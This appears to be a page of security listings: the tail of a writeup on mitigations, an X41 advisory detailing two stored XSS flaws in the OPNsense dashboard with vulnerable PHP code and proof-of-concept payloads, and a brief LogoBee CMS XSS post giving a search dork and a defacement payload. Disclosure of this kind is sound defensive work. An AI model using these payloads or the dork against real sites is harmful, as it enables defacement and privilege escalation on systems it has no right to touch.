*   **Session Management**: Implement secure session management to ensure that session cookies and tokens are properly protected and rotated.
    
*   **Security Headers**: Use security headers like X-XSS-Protection and X-Content-Type-Options to instruct browsers to mitigate certain types of attacks.
    

That’s all in this writeup.

Thanks for reading this far. If you enjoyed the writeup, do support me **here**.

CVE-2023-43456: CVE-2023-43456 - Stored Cross-Site Scripting (XSS)

OPNsense versions 23.1.11_1, 23.7.3, and 23.7.4 suffer from cross site scripting vulnerabilities that can allow for privilege escalation.

Advisory X41-2023-001: Two Vulnerabilities in OPNsense  
===========================================================  
Highest Severity Rating: High  
Confirmed Affected Versions: 23.1.11_1, 23.7.3, 23.7.4  
Confirmed Patched Versions: Commit 484753b2abe3fd0fcdb73d8bf00c3fc3709eb8b7  
Vendor: Deciso B.V. / OPNsense  
Vendor URL: https://opnsense.org  
Credit: X41 D-Sec GmbH, Yasar Klawohn and JM  
Status: Public   
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2023-001-opnsense

Summary and Impact  
------------------  
The OPNsense dashboard displays widgets with information about the system,  
running services, gateways and more. These widgets can be arranged in  
different orders and columns. The values for the number of columns and the  
order of widgets are stored server-side and are the same for all users of an  
OPNsense instance. They are reflected unmodified on every visit. This can be  
abused by a low-privileged attacker to inject their own content into the  
page, enabling a cross-site scripting (XSS) attack that can result in  
privilege escalation.

Product Description  
-------------------  
OPNsense is an open source, FreeBSD-based firewall and routing operating  
system. It includes many features of commercial firewalls and can be managed  
entirely via its web GUI.

Stored XSS in the OPNsense Dashboard via the column_count Parameter  
===================================================================  
Severity Rating: High  
Vector: Network  
CWE: 79  
CVSS Score: 8.0  
CVSS Vector: 3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H  
Credit: X41 D-Sec GmbH, Yasar Klawohn

Analysis  
--------  
The number of columns displayed in the dashboard is set via an HTTP POST  
request to /index.php, using the column_count request parameter. This  
parameter is not properly escaped when returned to the client. To exploit  
this issue, the payload "><script>alert(1)</script> is submitted as part of  
the column_count parameter. This input is reflected unmodified in the  
response and on any subsequent visit to the dashboard by any user. Only the  
"Lobby: Login / Logout / Dashboard" permission is required to abuse this  
issue.

Once the server receives the POST request, the column_count parameter is  
written unmodified into the configuration:

} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['origin'])  
            && $_POST['origin'] == 'dashboard') {  
    // ...  
    if (!empty($_POST['column_count'])) {  
        $config['widgets']['column_count'] = $_POST['column_count'];  
    } elseif(isset($config['widgets']['column_count'])) {  
        unset($config['widgets']['column_count']);  
    }  
    write_config('Widget configuration has been changed');  
    header(url_safe('Location: /index.php'));  
    exit;  
}  
// from:  
// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L66-L79

If the column_count parameter is not empty, it is used unmodified: 

// ...  
if ($_SERVER['REQUEST_METHOD'] === 'GET') {  
    $pconfig = $config['widgets'];  
    // ...  
    $pconfig['column_count'] =  
       !empty($pconfig['column_count']) ? $pconfig['column_count'] : 2;  
    // ...  
// from:  
// https://github.com/opnsense/core/blob/306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L42

Below, the unmodified value is written:

  
<section class="page-content-main">  
  <form method="post" id="iform">  
    <input type="hidden" value="dashboard" name="origin" id="origin" />  
    <input type="hidden" value="" name="sequence" id="sequence" />  
    <input type="hidden" value="<?= $pconfig['column_count'];?>"  
        name="column_count" id="column_count_input" />  
  </form>  
  


Proof of Concept  
----------------  
Log in as root. On the left side, go to System -> Access -> Users, and add a  
new user. For "Effective Privileges", only select "Lobby: Login / Logout /  
Dashboard". The user is now only able to view the dashboard and the help  
pages.

Log in as that newly created user and open your browser's network monitor.  
In the OPNsense dashboard, select "1 column" from the top right and then  
press "save settings". Repeat the POST request and replace the column_count  
variable with

column_count=1"><script>alert(1)</script>

Now, log in as admin again, you should see an alert box resulting from the  
following HTML response:

<form method="post" id="iform">  
      
    <input type="hidden" value="1">  
        <script>alert(1)</script>"  
        name="column_count" id="column_count_input" />  
</form>

This is the stored XSS and can result in privilege escalation. The OPNsense  
developers did apply a Content-Security-Policy, but unfortunately allow  
unsafe-inline and unsafe-eval for scripts, which does not prevent the  
exploitation of this vulnerability.

Stored XSS in the OPNsense Dashboard via the sequence Parameter  
===============================================================  
Severity Rating: High   
Vector: Network  
CWE: 79  
CVSS Score: 8.0  
CVSS Vector: 3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H  
Credit: X41 D-Sec GmbH, JM and Yasar Klawohn

Analysis  
--------  
The order in which the widgets are displayed in the Dashboard is set via an  
HTTP POST request to /index.php, using the sequence request parameter. This  
parameter is not properly escaped when returned to the client. To exploit  
this issue, the payload "><script>alert(1)</script> is submitted as part of  
the sequence parameter. This input is reflected unmodified in the response  
and on any subsequent visit to the dashboard by any user. Only the "Lobby:  
Login / Logout / Dashboard" permission is required to abuse this issue.

The order in which widgets are displayed on the dashboard can be set in the  
same POST request, via the sequence parameter. The sequence parameter has the  
following format:

sequence=services_status-container:00000000-col3:show,  
    interface_list-container:00000001-col4:show,  
    gateways-container:00000002-col4:show

Once the server receives the POST request, the sequence parameter is written  
unmodified into the configuration:

} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['origin'])  
            && $_POST['origin'] == 'dashboard') {  
    if (!empty($_POST['sequence'])) {  
        $config['widgets']['sequence'] = $_POST['sequence'];  
    } elseif (isset($config['widgets']['sequence'])) {  
        unset($config['widgets']['sequence']);  
    }  
    // ...  
    write_config('Widget configuration has been changed');  
    header(url_safe('Location: /index.php'));  
    exit;  
}  
// from:  
// https://github.com/opnsense/core/blob/cbaf7cee1f0a6fabd1ec4c752a5d169c402976dc/src/www/index.php#L66-L80

When serving a GET request, the sequence parameter is returned unmodified,  
starting with a read of its value from the configuration:

// ...  
$pconfig = $config['widgets'];  
// set default dashboard view  
$pconfig['sequence'] = !empty($pconfig['sequence']) ?  
    $pconfig['sequence'] : '';  
// ...  
// from:  
// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L39-L41

sequence is then split by comma and further split by colon into name,  
sortKey, and state. The list of widgets is sorted on the server side using  
the sortKey.

$widgetSeqParts = explode(",", $pconfig['sequence']);  
foreach (glob('/usr/local/www/widgets/widgets/*.widget.php') as $php_file) {  
    $widgetItem = array();  
    // [...]  
    foreach ($widgetSeqParts as $seqPart) {  
        $tmp = explode(':', $seqPart);  
        if (count($tmp) == 3 &&  
            explode('-', $tmp[0])[0] == $widgetItem['name']  
        ) {  
            $widgetItem['state'] = $tmp[2];  
            $widgetItem['sortKey'] = $tmp[1];  
        }  
    }  
    $widgetCollection[] = $widgetItem;  
}  
// sort widgets  
usort($widgetCollection, function ($item1, $item2) {  
    return strcmp(strtolower($item1['sortKey']),  
        strtolower($item2['sortKey']));  
});  
// from:  
// https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L44-L65

Finally, the sortKey is written unescaped into an HTML attribute:

<section  
    class="widgetdiv"  
    data-sortkey="<?=$widgetItem['sortKey'] ?>"  
    id="<?=$widgetItem['name'];?>"  
    style="display:<?=$divdisplay;?>;"  


Proof of Concept  
----------------  
Log in as root. On the left side, go to System -> Access -> Users, and add a  
new user. For "Effective Privileges", only select "Lobby: Login / Logout /  
Dashboard". The user is now only able to view the dashboard and the help  
pages.

Log in as that newly created user and open your browser's network monitor. In  
the OPNsense dashboard, reorder the widgets via drag-and-drop, then press  
"save settings".

Repeat the POST request and replace the sequence variable with

sequence=gateways-container:1"><script>alert(1)</script>-col4:show

Now, log in as admin again, you should see an alert box resulting from the  
following HTML response:

<div class="container-fluid">  
      
        <section class="widgetdiv" data-sortkey="1">  
            <script>alert(2)</script>  
            -col4" id="gateways"  style="display:block;">

This is the stored XSS and can result in privilege escalation.

The OPNsense developers did apply a Content-Security-Policy, but  
unfortunately allow unsafe-inline and unsafe-eval for scripts, which does not  
prevent the exploitation of this vulnerability.

Workarounds  
===========

Remove all effective privileges for /index.php* of low-privilege users.

Timeline  
========  
2023-09-13: Problem discovered

2023-09-14: Write-up and discovery of second finding

2023-09-19: Disclosure to Deciso B.V. / OPNsense

2023-09-19: Issue fixed upstream by Deciso B.V. / OPNsense

2023-09-20: CVE requested

2023-09-20: Informed Deciso B.V. / OPNsense that we will make the issues  
public the following day, since the patch is public

2023-09-21: Release of advisory

About X41 D-Sec GmbH  
====================  
X41 is an expert provider for application security services.  
Having extensive industry experience and expertise in the area of information  
security, a strong core security team of world class security experts enables  
X41 to perform premium security services.

Fields of expertise in the area of application security are security centered  
code reviews, binary reverse engineering and vulnerability discovery.  
Custom research and IT security consulting and support services are core  
competencies of X41.

OPNsense 23.1.11_1 / 23.7.3 / 23.7.4 Cross Site Scripting / Privilege Escalation

LogoBee CMS version 0.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : LogoBee CMS v0.2 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://logobee.com                                                                                                |  | # Dork      : intext:''Logo & Web Design by LogoBee''                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /updates.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://vaxform127.0.0.1/updates.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#php